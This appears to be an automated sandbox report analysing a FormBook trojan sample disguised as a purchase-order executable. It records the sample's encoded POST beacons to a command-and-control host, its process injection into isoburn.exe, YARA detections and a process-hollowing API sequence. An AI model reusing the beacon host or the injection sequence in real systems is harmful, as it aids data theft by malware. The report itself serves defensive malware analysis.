                                                                        Data Ascii: Ot=0gIjKnK2BJtevHKZCgtS1sMyyVVH0vy66LHt8W/V4WLlF/aQfG2nKBXF9Es9EVY+CdEoTKgcS2HF3K2vsNPx6YLsFnskiMJsZhtZOdDD5myNK8Krm9SIURsvZOltOkzwkGL8UBoVQyz4HWczQMlaRKiRynzw/rH2yKNXfDpi7/lxF0BYPQ==
                                                                        Dec 2, 2023 18:52:21.507111073 CET242INHTTP/1.0 403 Forbidden
                                                                        Cache-Control: no-cache
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        50192.168.2.104976237.97.254.2780
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:52:25.600060940 CET827OUTPOST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.wrautomotive.online
                                                                        Origin: http://www.wrautomotive.online
                                                                        Referer: http://www.wrautomotive.online/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 203
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Raw: 4f 74 3d 30 67 49 6a 4b 6e 4b 32 42 4a 74 65 39 55 53 5a 41 42 74 53 30 4d 4d 78 72 6c 56 48 39 50 79 2b 36 4c 44 74 38 54 66 46 34 6c 76 6c 45 61 2b 51 59 33 32 6e 4c 42 58 46 79 6b 74 33 4b 31 5a 54 43 64 4a 56 54 4c 4d 63 53 32 6a 46 33 4c 71 76 73 2b 33 77 37 49 4c 69 49 48 73 6d 6d 4d 4a 73 5a 68 74 5a 4f 64 48 70 35 6d 71 4e 4b 4d 61 72 6e 5a 47 4c 56 52 73 75 65 4f 6c 74 4b 6b 7a 30 6b 47 4c 53 55 41 6c 79 51 78 62 34 48 55 45 7a 51 39 6c 62 62 4b 69 74 39 48 79 2b 2f 70 69 49 33 36 70 2b 55 77 74 68 36 72 51 43 4e 42 74 4c 49 75 62 50 66 4c 73 36 35 38 4e 70 34 73 4e 49 32 45 30 4b 71 57 6f 3d
                                                                        Data Ascii: Ot=0gIjKnK2BJte9USZABtS0MMxrlVH9Py+6LDt8TfF4lvlEa+QY32nLBXFykt3K1ZTCdJVTLMcS2jF3Lqvs+3w7ILiIHsmmMJsZhtZOdHp5mqNKMarnZGLVRsueOltKkz0kGLSUAlyQxb4HUEzQ9lbbKit9Hy+/piI36p+Uwth6rQCNBtLIubPfLs658Np4sNI2E0KqWo=
                                                                        Dec 2, 2023 18:52:25.784513950 CET242INHTTP/1.0 403 Forbidden
                                                                        Cache-Control: no-cache
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:18:48:14
                                                                        Start date:02/12/2023
                                                                        Path:C:\Users\user\Desktop\PO_YTWHDF3432.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Users\user\Desktop\PO_YTWHDF3432.exe
                                                                        Imagebase:0x600000
                                                                        File size:956'928 bytes
                                                                        MD5 hash:0BC4DF2DAA2BEA193866307038113708
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:3
                                                                        Start time:18:48:15
                                                                        Start date:02/12/2023
                                                                        Path:C:\Users\user\Desktop\PO_YTWHDF3432.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Users\user\Desktop\PO_YTWHDF3432.exe
                                                                        Imagebase:0xe10000
                                                                        File size:956'928 bytes
                                                                        MD5 hash:0BC4DF2DAA2BEA193866307038113708
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1371406430.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1371406430.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1371528010.0000000001E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1371528010.0000000001E00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:10
                                                                        Start time:18:48:19
                                                                        Start date:02/12/2023
                                                                        Path:C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe"
                                                                        Imagebase:0x80000
                                                                        File size:140'800 bytes
                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3732619108.0000000002390000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3732619108.0000000002390000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                        Reputation:moderate
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:11
                                                                        Start time:18:48:20
                                                                        Start date:02/12/2023
                                                                        Path:C:\Windows\SysWOW64\isoburn.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\SysWOW64\isoburn.exe
                                                                        Imagebase:0xea0000
                                                                        File size:107'008 bytes
                                                                        MD5 hash:BF19DD525C7D23CAFC086E9CCB9C06C6
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3732735204.0000000003700000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3732735204.0000000003700000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3732837802.0000000004F00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3732837802.0000000004F00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:13
                                                                        Start time:18:48:32
                                                                        Start date:02/12/2023
                                                                        Path:C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe"
                                                                        Imagebase:0x80000
                                                                        File size:140'800 bytes
                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3732252302.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.3732252302.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                        Reputation:moderate
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:15
                                                                        Start time:18:48:44
                                                                        Start date:02/12/2023
                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                        Imagebase:0x7ff613480000
                                                                        File size:676'768 bytes
                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        Disassembly

                                                                        Reset < >

                                                                          Execution Graph

                                                                          Execution Coverage:10.8%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:125
                                                                          Total number of Limit Nodes:17
                                                                          execution_graph 29341 4e7af90 29345 4e7b490 29341->29345 29355 4e7b480 29341->29355 29342 4e7af9f 29346 4e7b4a1 29345->29346 29349 4e7b4c4 29345->29349 29365 4e7a00c 29346->29365 29349->29342 29350 4e7b4bc 29350->29349 29351 4e7b6c8 GetModuleHandleW 29350->29351 29352 4e7b6f5 29351->29352 29352->29342 29356 4e7b4a1 29355->29356 29359 4e7b4c4 29355->29359 29357 4e7a00c GetModuleHandleW 29356->29357 29358 4e7b4ac 29357->29358 29358->29359 29363 4e7b728 2 API calls 29358->29363 29364 4e7b718 2 API calls 29358->29364 29359->29342 29360 4e7b4bc 29360->29359 29361 4e7b6c8 GetModuleHandleW 29360->29361 29362 4e7b6f5 29361->29362 29362->29342 29363->29360 29364->29360 29366 4e7b680 GetModuleHandleW 29365->29366 29368 4e7b4ac 29366->29368 29368->29349 29369 4e7b718 29368->29369 29375 4e7b728 29368->29375 29370 4e7b728 29369->29370 29371 4e7a00c GetModuleHandleW 29370->29371 29372 4e7b73c 29371->29372 29374 4e7b761 29372->29374 29380 4e7b0a8 29372->29380 29374->29350 29376 4e7a00c GetModuleHandleW 29375->29376 29377 4e7b73c 29376->29377 29378 4e7b0a8 LoadLibraryExW 29377->29378 29379 4e7b761 29377->29379 29378->29379 29379->29350 29381 4e7b908 LoadLibraryExW 29380->29381 29383 4e7b981 29381->29383 29383->29374 29221 49d2610 29222 49d279b 29221->29222 29223 49d2636 29221->29223 29223->29222 29226 49d2889 PostMessageW 29223->29226 29228 49d2890 PostMessageW 29223->29228 29227 49d28fc 29226->29227 29227->29223 29229 49d28fc 29228->29229 29229->29223 29251 49d1b40 29253 49d1ae4 29251->29253 29252 49d1cba 29253->29252 29256 49d1da9 29253->29256 29263 49d1db8 29253->29263 29258 49d1dc8 29256->29258 29257 49d1dd0 29257->29252 29258->29257 29270 49d250a 29258->29270 29277 49d25e0 29258->29277 29281 49d2081 29258->29281 29259 49d1edf 29259->29252 29265 49d1dc8 29263->29265 29264 49d1dd0 29264->29252 29265->29264 29267 49d250a 4 API calls 29265->29267 29268 49d2081 11 API calls 29265->29268 29269 49d25e0 2 API calls 29265->29269 29266 49d1edf 29266->29252 29267->29266 29268->29266 29269->29266 29271 49d2220 29270->29271 29272 49d2078 29271->29272 29275 49d14b8 WriteProcessMemory 29271->29275 29276 49d14c0 WriteProcessMemory 29271->29276 29303 49d10c8 29271->29303 29307 49d10c0 29271->29307 29272->29259 29275->29271 29276->29271 29311 49d1010 29277->29311 29315 49d1018 29277->29315 29278 49d25f8 29278->29259 29319 49d173d 29281->29319 29323 49d1748 29281->29323 29282 49d20b1 29284 49d2078 29282->29284 29296 49d10c8 Wow64SetThreadContext 29282->29296 29297 49d10c0 Wow64SetThreadContext 29282->29297 29283 49d2121 29283->29284 29301 49d15a9 ReadProcessMemory 29283->29301 29302 49d15b0 ReadProcessMemory 29283->29302 29284->29259 29285 49d2166 29285->29284 29298 49d118f VirtualAllocEx 29285->29298 29299 49d13f8 VirtualAllocEx 29285->29299 29300 49d11a0 VirtualAllocEx 29285->29300 29286 49d21cf 29286->29284 29294 49d14b8 WriteProcessMemory 29286->29294 29295 49d14c0 WriteProcessMemory 29286->29295 29287 49d21f6 29287->29284 29288 49d14b8 WriteProcessMemory 29287->29288 29289 49d14c0 WriteProcessMemory 29287->29289 29290 49d10c8 Wow64SetThreadContext 29287->29290 29291 49d10c0 Wow64SetThreadContext 29287->29291 29288->29287 29289->29287 29290->29287 29291->29287 29294->29287 29295->29287 29296->29283 29297->29283 29298->29286 29299->29286 29300->29286 29301->29285 29302->29285 29304 49d110d Wow64SetThreadContext 29303->29304 29306 49d1155 29304->29306 29306->29271 29308 49d10c8 Wow64SetThreadContext 29307->29308 29310 49d1155 29308->29310 29310->29271 29312 49d1018 ResumeThread 29311->29312 29314 49d1089 29312->29314 29314->29278 29316 49d1058 ResumeThread 29315->29316 29318 49d1089 29316->29318 29318->29278 29320 49d1748 CreateProcessA 29319->29320 29322 49d1993 29320->29322 29324 49d17d1 CreateProcessA 29323->29324 29326 49d1993 29324->29326 29230 4e74668 29231 4e7467a 29230->29231 29233 4e74686 29231->29233 29234 4e74779 29231->29234 29235 4e7479d 29234->29235 29239 4e74888 29235->29239 29243 4e74878 29235->29243 29240 4e748af 29239->29240 29242 4e7498c 29240->29242 29247 4e7449c 29240->29247 29245 4e748af 29243->29245 29244 4e7498c 29244->29244 29245->29244 29246 4e7449c CreateActCtxA 29245->29246 29246->29244 29248 4e75918 CreateActCtxA 29247->29248 29250 4e759db 29248->29250 29327 4e7d438 29328 4e7d47e 29327->29328 29332 4e7d608 29328->29332 29335 4e7d618 29328->29335 29329 4e7d56b 29338 4e7b470 29332->29338 29336 4e7d646 29335->29336 29337 4e7b470 DuplicateHandle 29335->29337 29336->29329 29337->29336 29339 4e7da88 DuplicateHandle 29338->29339 29340 4e7d646 29339->29340 29340->29329

                                                                          Executed Functions

                                                                          Function 08A50040 Relevance: 3.2, Instructions: 3150COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 38a4ad36ce4a076142c56a3d50004a0d75c8e1f39230db60835fc4ca9f6ebc45
                                                                          • Instruction ID: da12a92fed6fd899e3319d4cc9ced8d976f4511897d2c838eda360987738fd67
                                                                          • Opcode Fuzzy Hash: 38a4ad36ce4a076142c56a3d50004a0d75c8e1f39230db60835fc4ca9f6ebc45
                                                                          • Instruction Fuzzy Hash: D263D474A00619CFDB24DF68C988B9DB7B2BF89301F158599E859AB761CB30ADC1CF50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 08A54798 Relevance: .6, Instructions: 619COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 57c5628917db129abb2e1f0779f438438919d32f205998148b5a6e3fc0724ce3
                                                                          • Instruction ID: 923c28b42235c912d6b37c1ed810960a77d56edd0609bbfd2886ba11aa950841
                                                                          • Opcode Fuzzy Hash: 57c5628917db129abb2e1f0779f438438919d32f205998148b5a6e3fc0724ce3
                                                                          • Instruction Fuzzy Hash: 5E32E2B0A06214CFCB11CFA9C4447AEBBB2FF49301F24855AE845AF756D77099C1CBA9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 08A5B8C0 Relevance: .1, Instructions: 146COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: abd32f14e8742fa2d95368516d690cef3a03ac368762135a5ebda5826c3c38b8
                                                                          • Instruction ID: 148bea42a8752f8d1ec0b7234b97476cc0cd514f295fb0a834ae7934c494a594
                                                                          • Opcode Fuzzy Hash: abd32f14e8742fa2d95368516d690cef3a03ac368762135a5ebda5826c3c38b8
                                                                          • Instruction Fuzzy Hash: F251A574E056199FCB04CFAAD5806AEFBF2FF88311F24D565D819A7215D7309982CBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 08A5B8AF Relevance: .1, Instructions: 98COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6093e4eaa0b87a81a59fcdcfb2b2867b2f8440e1aa88a93512aa6fa650a5c07e
                                                                          • Instruction ID: 8bcf98742e4286aecd39a58e405aa25986f2dfefd5218b1138ad7cc035ea437d
                                                                          • Opcode Fuzzy Hash: 6093e4eaa0b87a81a59fcdcfb2b2867b2f8440e1aa88a93512aa6fa650a5c07e
                                                                          • Instruction Fuzzy Hash: D641B275E016189FDB08CFAAD5846DEFBF2BF88311F18D06AD418A7355DB309942CB50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 049D11A0 Relevance: 1.8, APIs: 1, Instructions: 252memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 934 49d11a0-49d11cf 935 49d11d5-49d11eb 934->935 936 49d1276-49d1279 934->936 937 49d13e5-49d147b VirtualAllocEx 935->937 938 49d11f1-49d11f9 935->938 939 49d127b-49d1283 936->939 940 49d12c5-49d12c7 936->940 963 49d147d-49d1483 937->963 964 49d1484-49d14a9 937->964 938->937 943 49d11ff-49d120f 938->943 944 49d1285-49d1287 939->944 945 49d1291-49d12b7 939->945 941 49d13dd-49d13e4 940->941 942 49d12cd-49d12e3 940->942 942->937 947 49d12e9-49d12f1 942->947 943->937 948 49d1215-49d1222 943->948 944->945 945->937 960 49d12bd-49d12c0 945->960 947->937 950 49d12f7-49d1304 947->950 948->937 951 49d1228-49d123f 948->951 950->937 953 49d130a-49d131a 950->953 954 49d1246 951->954 955 49d1241-49d1244 951->955 953->937 958 49d1320-49d133d 953->958 957 49d1248-49d1271 954->957 955->957 957->941 958->937 961 49d1343-49d134b 958->961 960->941 961->937 965 49d1351-49d1361 961->965 963->964 965->937 966 49d1367-49d1374 965->966 966->937 967 49d1376-49d138d 966->967 971 49d138f 967->971 972 49d1392-49d13d0 967->972 971->972 980 49d13d5 972->980 981 49d13d2 972->981 980->941 981->980
                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 049D146E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1262977297.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_49d0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: e111262392372b8608f0d5d6251e1357f1ae92f1e107310eb9d76031299e8279
                                                                          • Instruction ID: f04b84957e941c8114234254d0662d3292b1ff67031b0238baf25250b833decc
                                                                          • Opcode Fuzzy Hash: e111262392372b8608f0d5d6251e1357f1ae92f1e107310eb9d76031299e8279
                                                                          • Instruction Fuzzy Hash: 0491DF31A046259BDB09CF6DC88066EFBF6EF89310B24C62AE4559B659CB74FC41CBD0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 049D173D Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 982 49d173d-49d17dd 985 49d17df-49d17e9 982->985 986 49d1816-49d1836 982->986 985->986 987 49d17eb-49d17ed 985->987 991 49d186f-49d189e 986->991 992 49d1838-49d1842 986->992 989 49d17ef-49d17f9 987->989 990 49d1810-49d1813 987->990 993 49d17fd-49d180c 989->993 994 49d17fb 989->994 990->986 1002 49d18d7-49d1991 CreateProcessA 991->1002 1003 49d18a0-49d18aa 991->1003 992->991 995 49d1844-49d1846 992->995 993->993 996 49d180e 993->996 994->993 997 49d1869-49d186c 995->997 998 49d1848-49d1852 995->998 996->990 997->991 1000 49d1854 998->1000 1001 49d1856-49d1865 998->1001 1000->1001 1001->1001 1004 49d1867 1001->1004 1014 49d199a-49d1a20 1002->1014 1015 49d1993-49d1999 1002->1015 1003->1002 1005 49d18ac-49d18ae 1003->1005 1004->997 1007 49d18d1-49d18d4 1005->1007 1008 49d18b0-49d18ba 1005->1008 1007->1002 1009 49d18bc 1008->1009 1010 49d18be-49d18cd 1008->1010 1009->1010 1010->1010 1011 49d18cf 1010->1011 1011->1007 1025 49d1a30-49d1a34 1014->1025 1026 49d1a22-49d1a26 1014->1026 1015->1014 1027 49d1a44-49d1a48 1025->1027 1028 49d1a36-49d1a3a 1025->1028 1026->1025 1029 49d1a28 1026->1029 1031 49d1a58-49d1a5c 1027->1031 1032 49d1a4a-49d1a4e 1027->1032 1028->1027 1030 49d1a3c 1028->1030 1029->1025 1030->1027 1034 49d1a6e-49d1a75 1031->1034 1035 49d1a5e-49d1a64 1031->1035 1032->1031 1033 49d1a50 1032->1033 1033->1031 1036 49d1a8c 1034->1036 1037 49d1a77-49d1a86 1034->1037 1035->1034 1038 49d1a8d 1036->1038 1037->1036 1038->1038
                                                                          APIs
                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 049D197E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1262977297.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_49d0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: 23ad129c9747016f8ddc836e11bd1c009d4a5e53a183beca08da235085a94e12
                                                                          • Instruction ID: a399da376f08d769e78adcf40ffc46399cd8ca4ab68023e7b88d24a8e17049d3
                                                                          • Opcode Fuzzy Hash: 23ad129c9747016f8ddc836e11bd1c009d4a5e53a183beca08da235085a94e12
                                                                          • Instruction Fuzzy Hash: 57915B72D003199FEB24CFA9C841BEEBBB6FF44314F148569E809A7240DB74A985CF91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 049D1748 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1040 49d1748-49d17dd 1042 49d17df-49d17e9 1040->1042 1043 49d1816-49d1836 1040->1043 1042->1043 1044 49d17eb-49d17ed 1042->1044 1048 49d186f-49d189e 1043->1048 1049 49d1838-49d1842 1043->1049 1046 49d17ef-49d17f9 1044->1046 1047 49d1810-49d1813 1044->1047 1050 49d17fd-49d180c 1046->1050 1051 49d17fb 1046->1051 1047->1043 1059 49d18d7-49d1991 CreateProcessA 1048->1059 1060 49d18a0-49d18aa 1048->1060 1049->1048 1052 49d1844-49d1846 1049->1052 1050->1050 1053 49d180e 1050->1053 1051->1050 1054 49d1869-49d186c 1052->1054 1055 49d1848-49d1852 1052->1055 1053->1047 1054->1048 1057 49d1854 1055->1057 1058 49d1856-49d1865 1055->1058 1057->1058 1058->1058 1061 49d1867 1058->1061 1071 49d199a-49d1a20 1059->1071 1072 49d1993-49d1999 1059->1072 1060->1059 1062 49d18ac-49d18ae 1060->1062 1061->1054 1064 49d18d1-49d18d4 1062->1064 1065 49d18b0-49d18ba 1062->1065 1064->1059 1066 49d18bc 1065->1066 1067 49d18be-49d18cd 1065->1067 1066->1067 1067->1067 1068 49d18cf 1067->1068 1068->1064 1082 49d1a30-49d1a34 1071->1082 1083 49d1a22-49d1a26 1071->1083 1072->1071 1084 49d1a44-49d1a48 1082->1084 1085 49d1a36-49d1a3a 1082->1085 1083->1082 1086 49d1a28 1083->1086 1088 49d1a58-49d1a5c 1084->1088 1089 49d1a4a-49d1a4e 1084->1089 1085->1084 1087 49d1a3c 1085->1087 1086->1082 1087->1084 1091 49d1a6e-49d1a75 1088->1091 1092 49d1a5e-49d1a64 1088->1092 1089->1088 1090 49d1a50 1089->1090 1090->1088 1093 49d1a8c 1091->1093 1094 49d1a77-49d1a86 1091->1094 1092->1091 1095 49d1a8d 1093->1095 1094->1093 1095->1095
                                                                          APIs
                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 049D197E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1262977297.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_49d0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: 625e76d4f7c99bfdaca6e74d5ba8091286017addb28d3f445b052878b6263a86
                                                                          • Instruction ID: c8ee9ad55e4f23a3872de850cb3b5f493740b90358b4bb846b79b0e7a945b564
                                                                          • Opcode Fuzzy Hash: 625e76d4f7c99bfdaca6e74d5ba8091286017addb28d3f445b052878b6263a86
                                                                          • Instruction Fuzzy Hash: 40916C72D003199FEB24CFA9C841BEEBBB6BF44314F148579D809A7240DB74A985CF91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04E7B490 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
